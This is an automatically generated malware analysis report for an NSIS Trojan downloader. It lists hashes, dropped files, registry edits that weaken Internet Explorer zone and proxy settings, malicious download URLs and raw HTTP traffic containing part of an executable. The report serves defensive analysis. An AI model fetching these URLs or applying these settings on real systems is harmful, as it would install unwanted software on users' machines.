Trojan.NSIS.StartPage_fcb477e99b

by malwarelabrobot on October 15th, 2016 in Malware Descriptions.

Trojan-Downloader.NSIS.Adload.bx (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: fcb477e99b254561fcfefde63a0bed65
SHA1: 8e76b28344b1650a1e68bd30a37683e2ba8fb233
SHA256: a204cd36c52d8bc91335643bdf6e84dcc98bb19c1170f05b4d0dcf1aadb19ce0
SSDeep: 393216:4msZRvpPz1D9XAoPuJfI6107g66n/f/gMOCLysGY2rPIC:ps7xL1DtAoGJn25SHgWysGY2bt
Size: 17285428 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Web
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:616
LggJBBE5vd.exe:1608
Setup__2140_il11.exe:1740

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
RasPbFile
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ShimCacheMutex

File activity

The process %original file name%.exe:616 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\launch_reb[1].htm (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\580019566fa41[1].exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\LggJBBE5vd.exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\6j6GOciRXw (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1.tmp (0 bytes)

The process LggJBBE5vd.exe:1608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsu4.tmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\Setup__2140_il11.exe (55260 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\635845710 (871 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp (0 bytes)

The process Setup__2140_il11.exe:1740 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\logo[1].png (2150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\accept[1].gif (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dm_left_image[1].png (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\amipb[1].js (29529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].htm (7480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\finish[1].gif (2 bytes)

Registry activity

The process %original file name%.exe:616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 3E 47 04 3E E0 51 7D 5A 06 C1 41 06 F3 EC F9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process LggJBBE5vd.exe:1608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 E1 36 EA A8 AF 3C 87 D5 03 8E FD 50 45 8A 4C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process Setup__2140_il11.exe:1740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}]
"(Default)" = "Inst Class"

[HKCR\Interface\{34A7E5E5-8E1F-4204-A840-DE7721F49FFB}]
"(Default)" = "IBoot"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}\VersionIndependentProgID]
"(Default)" = "rakis.unblamed"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCR\TypeLib\{38D2A8D3-F52B-4D86-A7B8-D71A1D37BA91}\1.0]
"(Default)" = "InstallerLib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}\TypeLib]
"(Default)" = "{38d2a8d3-f52b-4d86-a7b8-d71a1d37ba91}"

[HKCR\Interface\{34A7E5E5-8E1F-4204-A840-DE7721F49FFB}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}\ProgID]
"(Default)" = "rakis.unblamed.1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCR\TypeLib\{38D2A8D3-F52B-4D86-A7B8-D71A1D37BA91}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\Setup__2140_il11.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\Setup__2140_il11.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKCR\rakis.unblamed]
"(Default)" = "Inst Class"

[HKCR\rakis.unblamed.1]
"(Default)" = "Inst Class"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\Interface\{34A7E5E5-8E1F-4204-A840-DE7721F49FFB}\TypeLib]
"(Default)" = "{38D2A8D3-F52B-4D86-A7B8-D71A1D37BA91}"

[HKCR\Interface\{34A7E5E5-8E1F-4204-A840-DE7721F49FFB}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\TypeLib\{38D2A8D3-F52B-4D86-A7B8-D71A1D37BA91}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il11.exe"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Setup__2140_il11\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}\Version]
"(Default)" = "1.0"

[HKCR\rakis.unblamed\CurVer]
"(Default)" = "rakis.unblamed.1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 69 3B 45 4E 80 7F EC 16 DF 4C 87 9E C5 74 FF"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1473856750"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKCR\TypeLib\{38D2A8D3-F52B-4D86-A7B8-D71A1D37BA91}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp"

[HKCR\rakis.unblamed.1\CLSID]
"(Default)" = "{e59781dd-ffd9-4ede-8b1c-043817fa2e37}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\Setup__2140_il11.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\Interface\{34A7E5E5-8E1F-4204-A840-DE7721F49FFB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Setup__2140_il11\DEBUG]
"Trace Level"

Dropped PE files

MD5 File path
b736a969ac263de8e1a7a079945e0eda c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm2.tmp\LggJBBE5vd.exe
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm2.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm2.tmp\inetc.dll
7caaf58a526da33c24cbe122e7839693 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz5.tmp\NSISdl.dll
37363051edef355103aaff18c65a7745 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz5.tmp\Setup__2140_il11.exe
89d40ecddf3ce6f3b0e6a84f40936912 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz5.tmp\nsArray.dll
b736a969ac263de8e1a7a079945e0eda c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\580019566fa41[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 233472 11432 11776 1.94603 944e14399617ec3c5d6fddb92f5bd229

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=2273&tid=10277909&b_typ=pe&n=QWRndWFyZCBQcmVtaXVtIHY2LjEuMjQ1LjEyMTIg&reb=1&ic=
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css
hxxp://dyno3mlj15jgv.cloudfront.net/V38/amipb.js
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/finalize.php
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/Html/1bb0b654-6d8e-40c5-b993-0a341b40c375/logo.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png 216.137.61.248
hxxp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2273&tid=10277909&b_typ=pe&n=QWRndWFyZCBQcmVtaXVtIHY2LjEuMjQ1LjEyMTIg&reb=1&ic= 216.137.61.45
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css 216.137.61.248
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif 216.137.61.248
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif 216.137.61.248
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif 216.137.61.248
hxxp://www.millesimalnonremuneration.site/Html/1bb0b654-6d8e-40c5-b993-0a341b40c375/logo.png 54.243.162.76
hxxp://www.millesimalnonremuneration.site/index.php 54.243.162.76
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif 216.137.61.248
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif 216.137.61.248
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif 216.137.61.248
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png 54.243.162.153
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif 216.137.61.248
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png 216.137.61.248
hxxp://cdn1.leadingdownload.com/V38/amipb.js 216.137.61.109
hxxp://www.millesimalnonremuneration.site/finalize.php 54.243.162.76
pe-sixi.com 69.197.35.236


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE SoundCloud Downloader Install Beacon
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0
Host: VVV.dosecuretrips.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Setup__2140_il11.exe"
Content-Type: application/x-msdownload
Date: Thu, 13 Oct 2016 23:31:56 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 13 Oct 2016 23:31:56 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: Setup__2140_il11.exe
Content-Length: 716800
Connection: Close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........<...R..
.R...R.u.....R..4....R.......R..4..Q.R.......R..4....R...R...R.......R
.......R...S...R..4....R..4....R..4....R.Rich..R......................
...PE..L....D.W.................b........................@............
[email protected]........
...HE......................<Z.. ...................................
@...............\............................text....`.......b........
.......... ..`.rdata...............f..............@[email protected]....[...@..
[email protected]..............@[email protected]
..>].......^[email protected].................................
......................................................................
......................................................................
......................................................................
...................................................... ..........3.9..
...V........D$.....^...j ..NF......3.9.tRj.h|.G..M..E......]..].......
]..}...E.s..E.SSS.6Ph..G..X...YY...6....F.Sj..M............3..H..H....
3....H..|.H..x.H..t.H....H..t.H..3.9..XH.t..=.XH....XH.s...XH..j..vTF.
......}.j.....G.X3.3..G.._.f.O..][email protected]....._
l3.f.G\........G......................................................
......................................_x._|................V........D$
..t.V.#>..Y..^...j..ETF......j....H.X3.3..}.....H...G....H.....
<<< skipped >>>


GET /launch_v5.php?p=sevenzip&pid=2273&tid=10277909&b_typ=pe&n=QWRndWFyZCBQcmVtaXVtIHY2LjEuMjQ1LjEyMTIg&reb=1&ic= HTTP/1.0
Host: get.enomenalco.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 871
Connection: close
Date: Thu, 13 Oct 2016 23:31:52 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 0164db6ca0f73af70bfd1b141e20277b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: -_rfo0HGF52feuyFa0tk1v-voPAOs9aB0ExcnDeBWhSDXIOwCvoUfw==
files=4.t1=dl.u1=hXXp://VVV.dosecuretrips.com/download.php?version=1.1
.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/do
wnloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cm
dline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_
